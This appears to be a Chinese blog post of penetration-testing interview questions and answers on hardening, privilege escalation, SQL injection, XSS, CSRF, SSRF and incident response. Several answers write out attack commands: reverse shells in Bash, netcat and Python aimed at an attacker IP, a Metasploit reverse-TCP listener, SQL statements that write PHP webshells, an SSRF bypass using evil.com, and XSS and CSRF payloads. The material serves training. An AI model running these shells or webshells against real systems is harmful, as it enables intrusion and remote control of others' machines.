网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年渗透测试面试题总结-拷打题库09
Windows、Linux、数据库的加固降权思路,任选其一 你使用什么工具来判断系统是否存在后门 如何绕过CDN获取目标网站真实IP,谈谈你的思路? 如果给你一个网站 谈一谈Windows系统与Linux系统提权的思路? 列举出您所知道的所有开源组件高危漏洞(十个以上) 反弹shell的常用命令?一般常反弹哪一种shell?为什么? CMD命令行如何查询远程终端开放端口 服务器为IIS+PHP+MySQL,发现root权限注入漏洞,讲讲你的渗透思路 请写出Mysql5数据库中查询库’helloworld’中’users’表所有列名的语句 SQL头注入点 php中命令执行涉及到的函数 SSRF漏洞的成因防御绕过 mysql写shell有几种方法 Metasploit打开反向监听的命令 应急响应的步骤 有哪些反向代理的工具? 什么是同源策略? XSS能用来做什么? XSS的三种类型,防御方法 存储型xss原理? 你怎么理解xss攻击? 如何快速发现xss位置? Domxss原理/防范 DOM型XSS与反射型XSS区别? 如何使得前端referer为空 cookie参数,security干什么的 如果SRC上报了一个XSS漏洞,payload已经写入页面,但未给出具体位置,如何快速介入? XSS,CSRF,CRLF比较容易弄混,说说三者的原理,防御方法 csrf如何不带referer访问
1. Linux系统加固降权思路
核心措施:
- 最小化权限:
- 使用
chmod 750
限制敏感目录权限(如/etc
)。- 通过
visudo
限制用户sudo
权限。- 禁用高危服务:
- 关闭不必要的服务:
systemctl disable telnet
。- 禁用Root远程登录:修改
/etc/ssh/sshd_config
中PermitRootLogin no
。- 日志监控:
- 配置
auditd
监控敏感操作(如文件修改、用户提权)。
2. 系统后门检测工具
常用工具:
- Rootkit检测:
rkhunter --check
(扫描隐藏文件、异常进程)。chkrootkit
(检测已知Rootkit特征)。- 网络分析:
netstat -antp
(检查异常连接)。lsof -i :可疑端口
(定位进程)。
3. 绕过CDN获取真实IP
技术手段:
- 历史DNS记录:
- 使用
SecurityTrails
查询目标域名历史解析记录。- 子域名探测:
- 通过
subfinder
扫描子域名(部分子域名可能未配置CDN)。- SSL证书匹配:
- 在
Censys
中搜索相同证书的IP地址。- 邮件服务器溯源:
- 分析邮件头中
Received
字段获取服务器IP。
4. 给定网站的渗透思路
步骤:
- 信息收集:
- Whois查询、目录扫描(
dirsearch -u http://target
)。- 漏洞探测:
- SQL注入:
sqlmap -u "http://target/?id=1"
。- 文件上传:测试绕过
.htaccess
限制。- 权限提升:
- 利用内核漏洞(
dirtycow
)或配置错误(SUID)。
5. Windows与Linux提权思路
Windows提权:
- 服务路径滥用:
sc config VulnService binPath= "C:\shell.exe"
。- 令牌窃取:利用
incognito
模仿SYSTEM令牌。Linux提权:
- SUID提权:
find / -perm -4000 2>/dev/null
。- 内核漏洞:利用
CVE-2021-4034
(Polkit提权)。
6. 开源组件高危漏洞(10+)
组件/漏洞 CVE/影响 Log4j2 CVE-2021-44228(RCE) Apache Struts2 S2-045(远程代码执行) Spring Cloud CVE-2022-22963(SpEL注入) Fastjson 反序列化RCE(1.2.24及以下) Drupal CVE-2018-7600(Drupalgeddon2) ThinkPHP 多版本RCE(如5.x路由注入) Elasticsearch CVE-2015-1427(Groovy脚本执行) OpenSSL Heartbleed(CVE-2014-0160) Jenkins CVE-2018-1000861(RCE) Nginx CVE-2013-2028(栈溢出)
7. 反弹Shell命令及选择
常用命令:
- Bash:
bash -i >& /dev/tcp/攻击IP/端口 0>&1
(兼容性强)。- Netcat:
nc -e /bin/sh 攻击IP 端口
。- Python:
python
import socket,os,pty;s=socket.socket();s.connect((" 攻击IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
首选原因:Bash广泛支持且无需额外依赖。
8. CMD查询远程开放端口
命令:
cmd
netstat -ano | findstr "ESTABLISHED" # 查看已连接端口 telnet 目标IP 端口 # 手动测试端口连通性
9. IIS+PHP+MySQL渗透思路
- 利用SQL注入:
- 通过
UNION SELECT
写入WebShell:SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE 'C:/inetpub/wwwroot/shell.php'
。- UDF提权:
- 上传恶意DLL并创建函数执行系统命令。
- 横向移动:
- 利用数据库凭证尝试登录其他服务(如SSH、远程桌面)。
10. 查询MySQL表列名
语句:
sql
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='helloworld' AND TABLE_NAME='users';
11. SQL头注入点
常见注入位置:
- HTTP头字段:
User-Agent
、X-Forwarded-For
、Cookie
。
示例:http
GET / HTTP/1.1 User-Agent: ' UNION SELECT 1,2,3 --
12. PHP命令执行函数
高危函数:
system("whoami")
exec("cat /etc/passwd")
shell_exec("id")
passthru("ls")
13. SSRF漏洞防御与绕过
维度 内容 成因 未校验用户输入的URL参数 防御 限制协议(仅HTTP/HTTPS)、禁用重定向 绕过 使用 http://127.0.0.1@evil.com
或IPv6
14. MySQL写Shell方法
- INTO OUTFILE:需
FILE
权限和可写路径。- 日志文件:
sql
SET GLOBAL general_log_file='/var/www/shell.php'; SET GLOBAL general_log=ON;
15. Metasploit反向监听命令
bash
msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 攻击IP set LPORT 端口 run
16. 应急响应步骤
- 隔离网络:断开受感染主机网络。
- 取证分析:使用
Volatility
分析内存镜像。- 清除后门:删除恶意文件并修复漏洞。
- 恢复监控:部署HIDS(如Osquery)。
17. 反向代理工具
- Nginx:高性能,支持负载均衡。
- Apache:模块化设计,兼容性强。
- HAProxy:专用于TCP/HTTP流量分发。
18. 同源策略(SOP)
定义:浏览器限制脚本仅访问同协议、域名、端口的资源。
示例:https://a.com
无法读取https://b.com
的Cookie。
19. XSS的用途
- 窃取Cookie:
document.cookie
发送至攻击者服务器。- 钓鱼攻击:伪造登录框诱导用户输入凭证。
- 会话劫持:通过JavaScript操作用户会话。
20. XSS类型与防御
类型 防御方法 存储型 输入过滤(如 htmlspecialchars
)反射型 输出编码 + 设置 HttpOnly
CookieDOM型 避免 eval()
,使用textContent
替代
21. 存储型XSS原理
流程:用户输入恶意脚本 → 存储至数据库 → 其他用户加载页面时执行。
示例:留言板插入<script>alert(1)</script>
。
22. 快速发现XSS位置
- 输入点测试:
- 表单、URL参数、HTTP头(如
Referer
)。- 自动化扫描:
- 使用
XSStrike
或Burp Suite
扫描反射点。
23. DOM型XSS与反射型区别
- DOM型:漏洞在客户端解析阶段触发,无需服务器参与。
- 反射型:恶意脚本经服务器返回后执行。
24. 清空Referer的方法
- HTML标签:
html
<meta name="referrer" content="no-referrer">
- JavaScript:
javascript
window.location.href = 'http://target?data=xxx';
25. Cookie的Security属性
作用:仅通过HTTPS传输Cookie,防止中间人窃取。
设置:Set-Cookie: session=123; Secure
。
26. XSS漏洞快速定位
- 代码审计:搜索
innerHTML
、document.write
等高风险函数。- 输入模糊测试:插入
<img src=x onerror=alert(1)>
观察是否弹窗。
27. XSS/CSRF/CRLF区别
漏洞 原理 防御方法 XSS 恶意脚本在用户浏览器执行 输入编码 + CSP策略 CSRF 伪造用户身份发起请求 Token校验 + SameSite Cookie CRLF 注入换行符控制HTTP头/日志 过滤 \r\n
+ 严格校验输入
28. CSRF不带Referer访问
绕过方法:
- 使用
<meta>
标签跳转:html
<meta http-equiv="refresh" content="0; url=http://bank.com/transfer?to=attacker">
- HTTPS页面发起请求:部分浏览器允许HTTPS页面不发送Referer。